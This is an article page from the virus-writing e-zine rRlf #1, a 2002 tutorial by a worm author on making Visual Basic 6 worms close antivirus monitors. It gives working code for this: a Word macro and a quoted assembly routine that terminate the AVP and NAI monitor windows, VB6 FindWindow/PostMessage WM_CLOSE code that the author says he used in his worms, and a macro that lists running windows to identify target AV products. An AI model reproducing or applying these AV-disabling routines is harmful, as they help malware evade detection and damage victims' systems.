<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="21.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="23.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - Turning off av monitors in Visual Basic 6 by Alco paul</u></b>
<p>You planned to write a worm in Visual Basic 6, attached the melissa code in your project, made some personalized payload and compiled your code...
<br>Then a message from your antivirus software pops out...
<p>"File 1 is a New Worm"
<p>Shitty... Almost all the worms that I made went through this morbid reality...
<br>To make my coding smoothly, I had to turn off my av whenever I compile and alpha-test my project...
<br>An idea suddenly popped out.. Isn't it cooler if my worm can turn off an av monitor, and do its thing without detection?
<br>I researched...
<p>I saw an article by LiteSYS/XAKER - <liteno2@softhome.net> in coderz #2 regarding turning off av monitors in vb...
<br>The routine uses MS-Word... Here's a sample used in the article..
<p>-------------------------
<br>Sub nohaybillete()
<br>On Error Resume Next
<p>For I = 1 to Tasks.Count
<br>If ( Tasks.Item(I).Name = "AVP Monitor" ) Then Tasks.Item(I).Close
<br>Next
<p>End Sub
<br>-------------------------
<p>This, when run in MS-Word VB Editor, will produce our desired result...
<br>It will close the running AVP monitor and whalla, the computer is "clean"..
<br>But we want the routine to be attached in a vb executable...
<br>And what if the infected computer doesn't contain MS Office... LiteSYS/XAKER provided an option...
<p>Quoted:
<p>"There's another method... what about dropping a simple executable
<br>(written in assembly ofcoz) that can use directly the FindWindowA and PostMessageA APIs?
<br>fully compatible with every windoze version and you don't have to relay in that untrustable Word object...
<p>I must thank Benny/29A for his AV monitor deactivation tute that appeared in 29A #4, because it was my inspiration to do this...
<p>Ok, you must use your Debug script or your Chr stuff to write to the file. Look at the assembly code first, it kills both AVP and NAI:
<p>--------------------------------
<br>.386
<br>.MODEL FLAT, STDCALL
<br>LOCALS
<br>JUMPS
<p>EXTRN ExitProcess:PROC
<br>EXTRN FindWindowA:PROC
<br>EXTRN PostMessageA:PROC
<p>.DATA
<br>DD ?
<br>.CODE
<p>RETRO:
<br>MOV EAX, OFFSET Titulo_NAI
<br>CALL MATA_MONI
<p>MOV EAX, OFFSET Titulo_AVP
<br>CALL MATA_MONI
<br>&nbsp;
<br>&nbsp;
<br>PUSH 0
<br>CALL ExitProcess
<p>Titulo_AVP db "AVP Monitor", 00h
<br>Titulo_NAI db "NAI_VS_STAT", 00h
<p>MATA_MONI PROC NEAR
<p>PUSH EAX
<br>PUSH 0
<br>CALL FindWindowA
<br>JNZ SI_MATARAS
<p>RET
<p>SI_MATARAS:
<br>PUSH 0
<br>PUSH 0
<br>PUSH 12h
<br>PUSH EAX
<br>CALL PostMessageA
<p>RET
<br>MATA_MONI ENDP
<p>END RETRO
--------------------------------
<p>Assemble, Link it and create your script or your Chrs...
<br>i don't like the debug script idea because it's too slooooow so i prefer put it on your virus/worm and you're all set, look at this example:
<p>--------------------------------"
<p>Self-explanatory...
<br>This routine will cause a lot of disk space and it's not efficient when executed, meaning it'll be a slow routine..
<br>LiteSYS/XAKER accepted this reality..
<p>Quoted:
<p>"This is not a fast and stealthy way so it's better to use some Chrs in your code instead of the debug script to do it,
<br>but i am to lazy to write some code so you may find the way..."
<p>I researched on FindWindowA and PostMessageA Apis.. Referred to my API text Viewer..
<p>--------------------------------------------------------
<p>&nbsp;&nbsp;&nbsp;&nbsp;Private Declare Function FindWindow Lib "user32" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Alias "FindWindowA" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ByVal lpClassName As String, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal lpWindowName As String) As Long
<p>&nbsp;&nbsp;&nbsp;&nbsp;Private Declare Function PostMessage Lib "user32" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Alias "PostMessageA" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ByVal hwnd As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal wMsg As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal wParam As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal lParam As Long) As Long
<p>&nbsp;&nbsp;&nbsp;&nbsp;Const WM_CLOSE = &H10 <----important constant
<p>----------------------------------------------------------
<p>Then I encountered an article from Microsoft...
<p>"HOWTO: Programmatically close a separate Application (Q176391)"
<p>Hehehehehe... Now let's concentrate....
<p>Description of the useful APIs from the article..
<p>"To programmatically close a single instance of a Windows program, you begin by getting the handle to the Window that you want to close with the FindWindow function.
<br>The FindWindow API function returns the handle of a top-level window whose class name and window name matches the string parameters.
<br>This function returns the handle of the window as a long value if it is successful and a null if it fails. To use this function, you must supply two parameters:
<br>&nbsp;
<br>&nbsp;
<br>lpClassName - A pointer to a null-terminated string that specifies the class name or is an atom that identifies the class-name string.
<br>In this application, you can pass vbNullString.
<br>&nbsp;
<br>&nbsp;
<br>lpWindowName - A pointer to a null-terminated string that specifies the window name (the window's title).
<br>&nbsp;
<br>&nbsp;
<br>Use the handle to send a message to close the window with the PostMessage API.
<br>The PostMessage API function sends a message to an application message queue and returns a value immediately.
<br>This function returns a non-zero value if the function is successful and zero if the function fails. To use this function, you must specify four parameters:
<p>hWnd - The handle of the window you want to close. This long value is available as the result of the FindWindow function.
<br>&nbsp;
<br>&nbsp;
<br>uInt - The message to post to the message queue. In this application, you would use the WM_CLOSE message.
<br>&nbsp;
<br>&nbsp;
<br>wParam - The first message parameter. For this message, you should pass a null value.
<br>&nbsp;
<br>&nbsp;
<br>lParam - The second message parameter. For this message, you should pass a null value. "
<p>Let us convert the description to a code...
<p>-------------------------------------------------
<br>Option Explicit
<br>Private Declare Function FindWindow Lib "user32" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Alias "FindWindowA" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ByVal lpClassName As String, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal lpWindowName As String) As Long
<p>Private Declare Function PostMessage Lib "user32" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Alias "PostMessageA" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ByVal hwnd As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal wMsg As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal wParam As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal lParam As Long) As Long
<p>Const WM_CLOSE = &H10
<br>Dim a As Long 
<br>Dim b As Long
<p>-------------------------------
<br>add-ons
<br>Dim c As Long
<br>Dim d As Long
<br>....
<br>-------------------------------
<p>a = FindWindow(vbNullString, "AVP Monitor")
<br>b = PostMessage(a, WM_CLOSE, vbNull, vbNull)
<p>-------------------------------
<br>add-ons
<br>c = FindWindow(vbNullString, "monitor name")
<br>d = PostMessage(c, WM_CLOSE, vbNull, vbNull)
<br>....
<br>--------------------------------------------------
<p>This is a short but powerful code...
<br>When attached to a vb project and run, it will programmatically close AVP monitor (when you have one running in your pc)... :)
<br>This code was used by almost all the worms that I've produced.. (from the AVP-tagged Alcaul to ....)...
<p>--------------------
<br>Finding our targets
<br>--------------------
<p>So now we know how to close a running window using the previous code laid....
<br>Now we have to find our target av monitors...
<p>Use MS-Word VB Editor
<p>--------------
<br>Sub search()
<br>On Error Resume Next
<br>For I = 1 to Tasks.Count
<br>Windowname = Tasks.Item(I).Name
<br>Set fs = CreateObject("Scripting.FileSystemObject")
<br>Set a = fs.CreateTextFile("c:\avlist.txt", True)
<br>a.WriteLine Windowname
<br>Next
<br>a.Close
<br>End Sub
<br>--------------
<p>When run, this will produce avlist.txt in c:\ which contains the resident/running window names of programs...
<p>Tip : If you want to identify all the target av monitors, first you have to download trial copies of antivirus softwares from www.download.com or www.tucows.com or from the av site...
<br>Install one, then search for the window name of the monitor, then uninstall after you identified it...
<br>Only run the av software, close all running apps.
<br>..Don't spare the apps in systray from closure...
<br>If you don't, you'll get a long list of resident/running apps in avlist.txt..
<br>&nbsp;
<br>&nbsp;
<br>That's all.... Hope this helps...
<p>alcopaul
<p>1/18/2k2
</body>
</html>
